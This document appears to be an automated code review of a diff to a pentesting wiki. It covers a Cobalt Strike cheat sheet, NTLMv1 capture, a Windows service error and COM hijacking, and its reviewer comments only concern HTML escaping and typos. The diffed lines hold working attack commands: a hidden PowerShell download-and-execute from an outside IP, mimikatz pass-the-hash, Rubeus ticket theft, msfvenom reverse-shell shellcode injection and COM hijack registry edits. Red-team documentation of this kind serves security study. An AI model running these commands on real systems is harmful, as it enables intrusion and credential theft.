printscreen # Take a single screenshot via PrintScr method
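Review bot: `execute-assembly </path/to/executable.exe>` sits inside the `<pre class="language-bash"><code class="lang-bash">` HTML block opened two lines above, so the HTML parser reads `</path/to/executable.exe>` as a bogus end tag and removes it; the rendered line becomes `execute-assembly ` with the placeholder gone. Keep `&#x3C;` (or `&lt;`) while the block is raw HTML, or convert the whole block to a fenced Markdown code block so the placeholders survive literally.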
@ -56,7 +56,7 @@ portscan [targets] [ports] [arp|icmp|none] [max connections]
# Powershell
# Import Powershell module
powershell-import C:\path\to\PowerView.ps1
powershell &#x3C;just write powershell cmd here>
powershell <just write powershell cmd here>
# User impersonation
## Token generation with creds
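Review bot: `powershell <just write powershell cmd here>` has the same raw-HTML problem: if this line is still inside the `<pre><code>` element opened under `### Beacon Options`, the angle-bracketed placeholder is parsed as an HTML tag and vanishes from the rendered page, leaving just `powershell`; `&#x3C;` was the correct escape there.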
@ -66,14 +66,14 @@ rev2self # Stop using token generated with make_token
## The use of make_token generates event 4624: An account was successfully logged on. This event is very common in a Windows domain, but can be narrowed down by filtering on the Logon Type. As mentioned above, it uses LOGON32_LOGON_NEW_CREDENTIALS which is type 9.
# UAC Bypass
elevate svc-exe &#x3C;listener>
elevate uac-token-duplication &#x3C;listener>
elevate svc-exe <listener>
elevate uac-token-duplication <listener>
runasadmin uac-cmstplua powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.5.120:80/b'))"
## Steal token from pid
## Like make_token but stealing the token from a process
steal_token [pid] # Also, this is useful for network actions, not local actions
## From the API documentation we know that this logon type "allows the caller to clone its current token". This is why the Beacon output says Impersonated &#x3C;current_username> - it's impersonating our own cloned token.
## From the API documentation we know that this logon type "allows the caller to clone its current token". This is why the Beacon output says Impersonated <current_username> - it's impersonating our own cloned token.
ls \\computer_name\c$ # Try to use generated token to access C$ in a computer
rev2self # Stop using token from steal_token
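Review bot: `elevate svc-exe <listener>`, `elevate uac-token-duplication <listener>` and `Impersonated <current_username>` have the same raw-HTML problem as the rest of this block: as angle-bracketed placeholders inside a `<pre><code>` element they become unknown tags and disappear when rendered, so `&#x3C;` should stay (or the block should become a fenced code block).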
@ -91,36 +91,36 @@ pth [pid] [arch] [DOMAIN\user] [NTLM hash]
pth [DOMAIN\user] [NTLM hash]
## Pass the hash through mimikatz
mimikatz sekurlsa::pth /user:&#x3C;username> /domain:&#x3C;DOMAIN> /ntlm:&#x3C;NTLM HASH> /run:"powershell -w hidden"
mimikatz sekurlsa::pth /user:<username> /domain:<DOMAIN> /ntlm:<NTLM HASH> /run:"powershell -w hidden"
## Withuot /run, mimikatz spawn a cmd.exe, if you are running as a user with Desktop, he will see the shell (if you are running as SYSTEM you are good to go)
steal_token &#x3C;pid> #Steal token from process created by mimikatz
steal_token <pid> #Steal token from process created by mimikatz
## Pass the ticket
## Request a ticket
execute-assembly C:\path\Rubeus.exe asktgt /user:&#x3C;username> /domain:&#x3C;domain> /aes256:&#x3C;aes_keys> /nowrap /opsec
execute-assembly C:\path\Rubeus.exe asktgt /user:<username> /domain:<domain> /aes256:<aes_keys> /nowrap /opsec
## Create a new logon session to use with the new ticket (to not overwrite the compromised one)
make_token &#x3C;domain>\&#x3C;username> DummyPass
## Write the ticket in the attacker machine from a poweshell session &#x26; load it
make_token <domain>\<username> DummyPass
## Write the ticket in the attacker machine from a poweshell session & load it
[System.IO.File]::WriteAllBytes("C:\Users\Administrator\Desktop\jkingTGT.kirbi", [System.Convert]::FromBase64String("[...ticket...]"))
kerberos_ticket_use C:\Users\Administrator\Desktop\jkingTGT.kirbi
## Pass the ticket from SYSTEM
## Generate a new process with the ticket
execute-assembly C:\path\Rubeus.exe asktgt /user:&#x3C;USERNAME> /domain:&#x3C;DOMAIN> /aes256:&#x3C;AES KEY> /nowrap /opsec /createnetonly:C:\Windows\System32\cmd.exe
execute-assembly C:\path\Rubeus.exe asktgt /user:<USERNAME> /domain:<DOMAIN> /aes256:<AES KEY> /nowrap /opsec /createnetonly:C:\Windows\System32\cmd.exe
## Steal the token from that process
steal_token &#x3C;pid>
steal_token <pid>
## Extract ticket + Pass the ticket
### List tickets
execute-assembly C:\path\Rubeus.exe triage
### Dump insteresting ticket by luid
execute-assembly C:\path\Rubeus.exe dump /service:krbtgt /luid:&#x3C;luid> /nowrap
execute-assembly C:\path\Rubeus.exe dump /service:krbtgt /luid:<luid> /nowrap
### Create new logon session, note luid and processid
execute-assembly C:\path\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe
### Insert ticket in generate logon session
execute-assembly C:\path\Rubeus.exe ptt /luid:0x92a8c /ticket:[...base64-ticket...]
### Finally, steal the token from that new process
steal_token &#x3C;pid>
steal_token <pid>
# Lateral Movement
## If a token was created it will be used
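Review bot: every `<username>`, `<DOMAIN>`, `<NTLM HASH>`, `<pid>`, `<aes_keys>`, `<domain>\<username>` and `<luid>` placeholder decoded in this hunk will be swallowed as an HTML tag if the block is still the `<pre><code>` element from `### Beacon Options`, leaving commands such as `steal_token ` and `make_token \ DummyPass` without their arguments; keep `&#x3C;` or convert the block to a fenced code block. The `&#x26; load it` to `& load it` change is harmless (`& l` is not a character reference). Typos in the context worth folding into this pass: `Withuot` (`Without`), `poweshell` (`powershell`), `insteresting` (`interesting`), and `Insert ticket in generate logon session` (`generated`).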
@ -157,12 +157,12 @@ beacon> spawn metasploit
# Pass session to Metasploit - Through shellcode injection
## On metasploit host
msfvenom -p windows/x64/meterpreter_reverse_http LHOST=&#x3C;IP> LPORT=&#x3C;PORT> -f raw -o /tmp/msf.bin
msfvenom -p windows/x64/meterpreter_reverse_http LHOST=<IP> LPORT=<PORT> -f raw -o /tmp/msf.bin
## Run msfvenom and prepare the multi/handler listener
## Copy bin file to cobalt strike host
ps
shinject &#x3C;pid> x64 C:\Payloads\msf.bin #Inject metasploit shellcode in a x64 process
shinject <pid> x64 C:\Payloads\msf.bin #Inject metasploit shellcode in a x64 process
# Pass metasploit session to cobalt strike
## Fenerate stageless Beacon shellcode, go to Attacks > Packages > Windows Executable (S), select the desired listener, select Raw as the Output type and select Use x64 payload.
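Review bot: `LHOST=<IP> LPORT=<PORT>` and `shinject <pid>` have the same raw-HTML placeholder issue as the rest of this file if they are inside the `<pre><code>` block, so `&#x3C;` should be kept or the block fenced; also `Fenerate stageless Beacon shellcode` in the last context line is a typo for `Generate`.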

View File

@ -83,7 +83,7 @@ Nowadays is becoming less common to find environments with Unconstrained Delegat
You could abuse some credentials/sessions you already have on the AD to **ask the printer to authenticate** against some **host under your control**. Then, using `metasploit auxiliary/server/capture/smb` or `responder` you can **set the authentication challenge to 1122334455667788**, capture the authentication attempt, and if it was done using **NTLMv1** you will be able to **crack it**.\
If you are using `responder` you could try to \*\*use the flag `--lm` \*\* to try to **downgrade** the **authentication**.\
_&#x4E;ote that for this technique the authentication must be performed using NTLMv1 (NTLMv2 is not valid)._
_Note that for this technique the authentication must be performed using NTLMv1 (NTLMv2 is not valid)._
Remember that the printer will use the computer account during the authentication, and computer accounts use **long and random passwords** that you **probably won't be able to crack** using common **dictionaries**. But the **NTLMv1** authentication **uses DES** ([more info here](#ntlmv1-challenge)), so using some services specially dedicated to cracking DES you will be able to crack it (you could use [https://crack.sh/](https://crack.sh) or [https://ntlmv1.com/](https://ntlmv1.com) for example).

View File

@ -506,7 +506,7 @@ accesschk.exe -uwcqv "Todos" * /accepteula ::Spanish version
If you are having this error (for example with SSDPSRV):
_System error 1058 has occurred._\
_&#x54;he service cannot be started, either because it is disabled or because it has no enabled devices associated with it._
_The service cannot be started, either because it is disabled or because it has no enabled devices associated with it._
You can enable it using

View File

@ -10,7 +10,7 @@ As the values of HKCU can be modified by the users **COM Hijacking** could be us
- where the _Result_ is **NAME NOT FOUND**.
- and the _Path_ ends with **InprocServer32**.
Once you have decided which not existent COM to impersonate execute the following commands. _Be careful if you decide to impersonate a COM that is loaded every few seconds as that could be overkill._&#x20;
Once you have decided which not existent COM to impersonate execute the following commands. _Be careful if you decide to impersonate a COM that is loaded every few seconds as that could be overkill._
```bash
New-Item -Path "HKCU:Software\Classes\CLSID" -Name "{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}"
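Review bot: `which not existent COM to impersonate` on the replaced line should read `which non-existent COM to impersonate`; `loaded every few seconds` is otherwise fine.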

File diff suppressed because one or more lines are too long